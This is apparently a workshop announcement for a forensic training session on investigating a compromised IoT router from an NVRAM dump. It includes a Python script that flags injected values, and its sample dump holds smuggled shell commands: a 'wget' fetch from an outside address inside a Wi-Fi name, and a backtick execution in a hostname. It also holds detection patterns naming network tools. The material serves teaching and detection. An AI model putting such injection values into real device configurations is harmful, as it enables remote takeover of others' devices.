Date and Time:
Tuesday, March 19, 14:00 – 18:00

This workshop is hybrid (online and face-to-face).

Description:

The danger posed by vulnerable IoT devices lies in large part in their potential for widespread takeover, as seen in the infamous Mirai botnet, which maintained over 200,000 compromised IoT devices exploited through, amongst other techniques, vulnerable server code. This workshop trains participants to investigate an exploitable IoT device, from firmware extraction to takeover. Participants will come to understand the utility of persistent storage such as NVRAM for carrying injected commands across binary boundaries, enabling remote code execution and persistent device takeover.

The exercise involves a realistic training scenario in which a router purchased by a company began to exhibit strange intervals of connectivity downtime. Employees suspected tampering and performed an NVRAM dump before completely unplugging the router out of caution. Being a junior enterprise, they did not have the network security infrastructure in place to monitor network traffic, and thus could not establish whether the device was in fact compromised, nor how.

The company assembled a group of specialists from around the world to investigate the situation and has provided the device, the firmware version, and the NVRAM memory dump. The dump – a listing of key-value pairs revealing a particular state of persistent memory – is the only starting point available for the investigation; all other volatile state was lost when the device was unplugged. Curious values appear in the dump, including suspicious configuration values. As forensic analysts, the questions become: how did such a value arrive in NVRAM, what can it do, and is it sufficient evidence for our investigation to conclude device takeover?

By leveraging static analysis techniques including extracting binary file metadata, front-end interface DOM scraping, and implementing basic data-flow analysis in Ghidra, attendees will find the source of the attack and come to realize the potential methods and techniques taken by the attacker to achieve device takeover.
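The first triage step on a dump like the one described above is to parse the key-value listing and flag configuration values that could not plausibly have been entered through the device's normal interface. The following is an added example, not material from the workshop; the dump format (one `key=value` per line, as printed by the nvram utility on many consumer routers) and every key and value in it are constructed for illustration.

```python
import re

# Constructed sample dump in "key=value" form; not the workshop's real dump.
SAMPLE_DUMP = """\
lan_ipaddr=192.168.1.1
wan_hostname=office-router
ntp_server=pool.ntp.org
ddns_url=http://example.org/update?host=x
http_passwd=changeme
ddns_hostname=example`/tmp/.x`
wl_ssid=Office;wget http://203.0.113.5/x
restore_defaults=0
"""

# Shell metacharacters that let a value break out of a quoted argument when a
# firmware binary interpolates an NVRAM value into a system()/popen() string.
INJECTION_CHARS = re.compile(r"[;&|`$]")
# Tool names that have no business inside a hostname, SSID or similar setting.
TOOL_NAMES = re.compile(r"\b(wget|curl|nc|telnetd|chmod)\b")


def parse_nvram_dump(text):
    """Parse key=value lines into a dict.

    Split on the first '=' only: legitimate values such as URLs may
    themselves contain '=' and must be preserved intact.
    """
    entries = {}
    for line in text.splitlines():
        if "=" not in line:
            continue  # blank lines or banner text from the dump tool
        key, value = line.split("=", 1)
        entries[key.strip()] = value
    return entries


def find_suspicious(entries):
    """Return {key: [reasons]} for values that look like injected commands."""
    findings = {}
    for key, value in entries.items():
        reasons = []
        if INJECTION_CHARS.search(value):
            reasons.append("shell metacharacters")
        if TOOL_NAMES.search(value):
            reasons.append("command-line tool name in a configuration value")
        if reasons:
            findings[key] = reasons
    return findings


if __name__ == "__main__":
    for key, reasons in find_suspicious(parse_nvram_dump(SAMPLE_DUMP)).items():
        print(f"{key}: {', '.join(reasons)}")
```

Each flagged key is then a lead for the static-analysis stage: find the binary that reads that key and follow the value to the call that consumes it.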

Preparation Details:

Please download the appropriate VM and set it up (import + test) on your computer before the workshop. If you do not want to use a VM, please see the “WORK_ON_YOUR_OWN_MACHINE_SETUP” guide for installing all dependencies on your own computer.

For either VM you load, the username and password are dfrwseu2024 (username == password).

For those NOT using Apple Silicon Chipsets (M1+)

  • Download the VM found in the folder “VIRTUALBOX_WINDOWS11”
  • Download VirtualBox based on your host system
  • In VirtualBox
    • Press “Import”
    • Search & Select “dfrws2024.ova” file from your filesystem
    • Wait for the import process to complete
  • Select the newly imported virtual machine
    • press “Start”
    • If you experience freezes, shut down the virtual machine and enable “3D acceleration” in the display options. If this doesn’t work, roll up your sleeves and debug using forums and YouTube
    • Adjust the number of CPUs and Memory (RAM) optimal for your host machine (more resources does not always equal a faster virtual machine, try reducing settings as well)

For those USING Apple Silicon Chipsets (M1+)

  • Download “UTM_WINDOWS11.zip”
  • Download UTM
  • Unzip “UTM_WINDOWS11.zip”
  • Open UTM
    • File > Open
    • Select “DFRWS_EU_2024_APPLE_SILICON_WINDOWS_VM.utm” file inside the “UTM_WINDOWS11” folder
    • Select your newly imported VM, then select the dropdown menu just below “Shared Directory” (not beside it), and press the “Browse” dropdown-option. This will be used to load the operating system ISO file
    • Browse and select the “22631.2861.231204-0538.23H2_NI_RELEASE_SVC_REFRESH_CLIENTCONSUMER_RET_A64FRE_en-us.iso” file in the “UTM_WINDOWS11” folder.
    • Adjust the number of CPUs and Memory (RAM) optimal for your host machine (more resources does not always equal a faster virtual machine, try reducing settings as well)
    • Start the VM!

Workshop organiser:

Anthony Andreoli is a Ph.D. researcher at Concordia University’s Security Research Center in Montreal, Quebec, Canada. His work focuses on binary code understanding and pattern detection for vulnerability analysis, detection, and prevention. An experienced teacher and communicator of ideas, he has been teaching computer science related material for over 5 years to students at both the undergraduate and graduate levels. He spends his free time endlessly inquiring about the nature of existence and human behaviour, and has an extremely shrunken perception of time.

Anis Lounis is a Ph.D. student and dedicated member of Concordia University’s Security Research Center in Montreal, Quebec, Canada, whose work focuses on advancing embedded system security. His expertise lies in uncovering vulnerabilities in IoT devices, complemented by a background in malware analysis.